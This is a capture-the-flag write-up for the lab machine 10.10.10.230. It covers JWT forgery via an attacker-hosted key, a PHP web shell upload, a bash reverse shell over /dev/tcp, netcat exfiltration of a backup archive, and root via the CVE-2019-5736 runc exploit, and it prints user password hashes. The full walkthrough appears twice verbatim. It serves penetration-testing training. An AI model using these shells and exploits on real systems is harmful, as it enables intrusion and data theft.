## 10.10.10.230
![](img/Pasted%20image%2020210402191652.png)
# Recon
Start off the scan with doing the T4 scan of all ports, then a version and default scripts scan on those found ports.
```Bash 
ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.230 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.230 -vvv -oA nmap
```
![](img/Pasted%20image%2020210402185003.png)

We see port 22 .80, and 10010 are open so we'll start off a directory scan and look for php files too
```Bash 
feroxbuster --url http://10.10.10.230 --scan-limit 3 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
```

```Bash 
feroxbuster --url http://10.10.10.230 --scan-limit 3 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php
```
![](img/Pasted%20image%2020210402190934.png)

# Exploit WebApp
We quickly see http://10.10.10.230/register and http://10.10.10.230/login so we try to register an account and press ctrl+shift+i to open firefox dev tools. in the *Storage* tab we can see our Auth token 
![](img/Pasted%20image%2020210402185859.png)

or if you prefer to use BurpSuite you can see the Auth cookie in the raw request
![](img/Pasted%20image%2020210402192121.png)

Seeing these cookies before in other CTFs I recognized it as a JWT *(JSON Web Tokens)* token that we can edit after we decode it to alter and recode. We can decode this token online at https://jwt.io or https://dinochiesa.github.io/jwt/
![](img/Pasted%20image%2020210402190048.png)

Or if you are doing this in BurpSuite you can 'JSON Web Tokens' and the 'JSON Web Token Attacker' plugins available in the BApp store.
to decode
![](img/Pasted%20image%2020210402192752.png)

This allows us to manipulate the token on the fly from the intercept
![](img/Pasted%20image%2020210402193423.png)

![](img/Pasted%20image%2020210402220755.png)

You will notice the code trying to retrieve a priv key from local host, so let's try to see if we change this to our IP we can get the server to pull something from us. First we are going to generate a RSA keypair
https://gist.github.com/ygotthilf/baa58da5c3dd1f69fae9
```Bash 
ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key
# Don't add passphrase
openssl rsa -in privKey.key -pubout -outform PEM -out privKey.key.pub
cat privKey.key
cat privKey.key.pub
```

Then we are going to start a python webserver to host the key, if all goes well you should see a connection from the webserver grabbing the .key be inputting the new cookie in dev tools of firefox and refreshing the page. In burp you can do a nice trick and do a find and replace of the cookie with regex. go to Proxy>Options then under Match and Replace make a new entry like the screenshot below
![](img/Pasted%20image%2020210403000057.png)

![](img/Pasted%20image%2020210402205021.png)

![](img/Pasted%20image%2020210402205053.png)

You will also notice a new link on top for the admin panel.
![](img/Pasted%20image%2020210402205241.png)

It gives you the option to view notes or upload files.

![](img/Pasted%20image%2020210402205741.png)

you will see the admin has left some notes

![](img/Pasted%20image%2020210402205355.png)

And see some names along with notes about php execution issues

![](img/Pasted%20image%2020210402205525.png)
![](img/Pasted%20image%2020210402205507.png)

So assuming php issue is in the upload functionality, lets create a simple shell to see if we can do code execution 
```<?=`$_GET[0]`?> ```
After uploading the php file they are nice enough to give us the random path of our uploaded file. :)

![](img/Pasted%20image%2020210402210444.png)

Testing it out, we have RCE

![](img/Pasted%20image%2020210402210405.png)

so lets try to get a reverse shell to netcat so we dont have to worry about URL encoding our commands, add this code to rev.php
```PHP
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
```
Once we get a netcat listener up on port 9001 , upload the rev.shell and then view it in the admin panel to execute the code.
![](img/Pasted%20image%2020210402212044.png)

and spawn a python TTY shell 
```python3 -c 'import pty; pty.spawn("/bin/sh")'```
finding a backup file in the www folder , lets send it to our box with netcat
```nc 10.10.16.22 9002 <home.tar.gz```
with the listener on our attack machine we recieve the file and then untar the file.
![](img/Pasted%20image%2020210402212924.png)

We have a key for user 'noah'  that we saw in the web notes and also in the /home folder, we can use his ssh key to log into his shell account. 
![](img/Pasted%20image%2020210402213453.png)
user is now pwned.
![](img/Pasted%20image%2020210402213329.png)

References: 
https://portswigger.net/bappstore/f923cbf91698420890354c1d8958fee6
https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a


# USER to ROOT
So now we now are user noah  and see he has some sudo privs
![](img/Pasted%20image%2020210403013403.png)

Searching around for Docker exploit we find CVE-2019-5736-PoC
```wget https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go```

and we install Go 
```Bash
# First, install the package
sudo apt install -y golang

# Then add the following to your .bashrc
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

# Reload your .bashrc
source .bashrc
```

change the payload inside main.go to just cat the /root/root.txt into /tmp/illwill then save the file
`var payload = "#!/bin/bash \n cat /root/root.txt> /tmp/illwill"`
compile by using ```go build main.go``` and run a python http server so we can host the file ```python3 -m http.server 80```

Log into noah, also log into a second noah ssh session in a new tab,  and run this command:
noah1: ```sudo /usr/bin/docker exec -it webapp-dev01 bash```
youll get a root shell , run this (obviously change your IP)
```wget http://10.10.16.22/main &&  chmod +x main  && ./main``` to download the compiled exploit to the /tmp folder,give it execute permissions and run it. As soon as it finishes running be ready to paste this into the noah2 ssh session:
```sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh```
![](img/Pasted%20image%2020210403024644.png)

Now go back to noah1 session and type 'exit' to log out of the root session, then cat the /tmp/illwill file.
![](img/Pasted%20image%2020210403024824.png)
![](img/Pasted%20image%2020210403024840.png)


Extra: crack these later?
 cat /opt/webapp/create_db.py
         User(username='admin', email='admin@thenotebook.local', uuid=admin_uuid, admin_cap=True, password="0d3ae6d144edfb313a9f0d32186d4836791cbfd5603b2d50cf0d9c948e50ce68"),
        User(username='noah', email='noah@thenotebook.local', uuid=noah_uuid, password="e759791d08f3f3dc2338ae627684e3e8a438cd8f87a400cada132415f48e01a2")

## 10.10.10.230
![](img/Pasted%20image%2020210402191652.png)
# Recon
Start off the scan with doing the T4 scan of all ports, then a version and default scripts scan on those found ports.
```Bash 
ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.230 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.230 -vvv -oA nmap
```
![](img/Pasted%20image%2020210402185003.png)

We see port 22 .80, and 10010 are open so we'll start off a directory scan and look for php files too
```Bash 
feroxbuster --url http://10.10.10.230 --scan-limit 3 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
```

```Bash 
feroxbuster --url http://10.10.10.230 --scan-limit 3 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php
```
![](img/Pasted%20image%2020210402190934.png)

# Exploit WebApp
We quickly see http://10.10.10.230/register and http://10.10.10.230/login so we try to register an account and press ctrl+shift+i to open firefox dev tools. in the *Storage* tab we can see our Auth token 
![](img/Pasted%20image%2020210402185859.png)

or if you prefer to use BurpSuite you can see the Auth cookie in the raw request
![](img/Pasted%20image%2020210402192121.png)

Seeing these cookies before in other CTFs I recognized it as a JWT *(JSON Web Tokens)* token that we can edit after we decode it to alter and recode. We can decode this token online at https://jwt.io or https://dinochiesa.github.io/jwt/
![](img/Pasted%20image%2020210402190048.png)

Or if you are doing this in BurpSuite you can 'JSON Web Tokens' and the 'JSON Web Token Attacker' plugins available in the BApp store.
to decode
![](img/Pasted%20image%2020210402192752.png)

This allows us to manipulate the token on the fly from the intercept
![](img/Pasted%20image%2020210402193423.png)

![](img/Pasted%20image%2020210402220755.png)

You will notice the code trying to retrieve a priv key from local host, so let's try to see if we change this to our IP we can get the server to pull something from us. First we are going to generate a RSA keypair
https://gist.github.com/ygotthilf/baa58da5c3dd1f69fae9
```Bash 
ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key
# Don't add passphrase
openssl rsa -in privKey.key -pubout -outform PEM -out privKey.key.pub
cat privKey.key
cat privKey.key.pub
```

Then we are going to start a python webserver to host the key, if all goes well you should see a connection from the webserver grabbing the .key be inputting the new cookie in dev tools of firefox and refreshing the page. In burp you can do a nice trick and do a find and replace of the cookie with regex. go to Proxy>Options then under Match and Replace make a new entry like the screenshot below
![](img/Pasted%20image%2020210403000057.png)

![](img/Pasted%20image%2020210402205021.png)

![](img/Pasted%20image%2020210402205053.png)

You will also notice a new link on top for the admin panel.
![](img/Pasted%20image%2020210402205241.png)

It gives you the option to view notes or upload files.

![](img/Pasted%20image%2020210402205741.png)

you will see the admin has left some notes

![](img/Pasted%20image%2020210402205355.png)

And see some names along with notes about php execution issues

![](img/Pasted%20image%2020210402205525.png)
![](img/Pasted%20image%2020210402205507.png)

So assuming php issue is in the upload functionality, lets create a simple shell to see if we can do code execution 
```<?=`$_GET[0]`?> ```
After uploading the php file they are nice enough to give us the random path of our uploaded file. :)

![](img/Pasted%20image%2020210402210444.png)

Testing it out, we have RCE

![](img/Pasted%20image%2020210402210405.png)

so lets try to get a reverse shell to netcat so we dont have to worry about URL encoding our commands, add this code to rev.php
```PHP
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
```
Once we get a netcat listener up on port 9001 , upload the rev.shell and then view it in the admin panel to execute the code.
![](img/Pasted%20image%2020210402212044.png)

and spawn a python TTY shell 
```python3 -c 'import pty; pty.spawn("/bin/sh")'```
finding a backup file in the www folder , lets send it to our box with netcat
```nc 10.10.16.22 9002 <home.tar.gz```
with the listener on our attack machine we recieve the file and then untar the file.
![](img/Pasted%20image%2020210402212924.png)

We have a key for user 'noah'  that we saw in the web notes and also in the /home folder, we can use his ssh key to log into his shell account. 
![](img/Pasted%20image%2020210402213453.png)
user is now pwned.
![](img/Pasted%20image%2020210402213329.png)

References: 
https://portswigger.net/bappstore/f923cbf91698420890354c1d8958fee6
https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a


# USER to ROOT
So now we now are user noah  and see he has some sudo privs
![](img/Pasted%20image%2020210403013403.png)

Searching around for Docker exploit we find CVE-2019-5736-PoC
```wget https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go```

and we install Go 
```Bash
# First, install the package
sudo apt install -y golang

# Then add the following to your .bashrc
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

# Reload your .bashrc
source .bashrc
```

change the payload inside main.go to just cat the /root/root.txt into /tmp/illwill then save the file
`var payload = "#!/bin/bash \n cat /root/root.txt> /tmp/illwill"`
compile by using ```go build main.go``` and run a python http server so we can host the file ```python3 -m http.server 80```

Log into noah, also log into a second noah ssh session in a new tab,  and run this command:
noah1: ```sudo /usr/bin/docker exec -it webapp-dev01 bash```
youll get a root shell , run this (obviously change your IP)
```wget http://10.10.16.22/main &&  chmod +x main  && ./main``` to download the compiled exploit to the /tmp folder,give it execute permissions and run it. As soon as it finishes running be ready to paste this into the noah2 ssh session:
```sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh```
![](img/Pasted%20image%2020210403024644.png)

Now go back to noah1 session and type 'exit' to log out of the root session, then cat the /tmp/illwill file.
![](img/Pasted%20image%2020210403024824.png)
![](img/Pasted%20image%2020210403024840.png)


Extra: crack these later?
 cat /opt/webapp/create_db.py
         User(username='admin', email='admin@thenotebook.local', uuid=admin_uuid, admin_cap=True, password="0d3ae6d144edfb313a9f0d32186d4836791cbfd5603b2d50cf0d9c948e50ce68"),
        User(username='noah', email='noah@thenotebook.local', uuid=noah_uuid, password="e759791d08f3f3dc2338ae627684e3e8a438cd8f87a400cada132415f48e01a2")

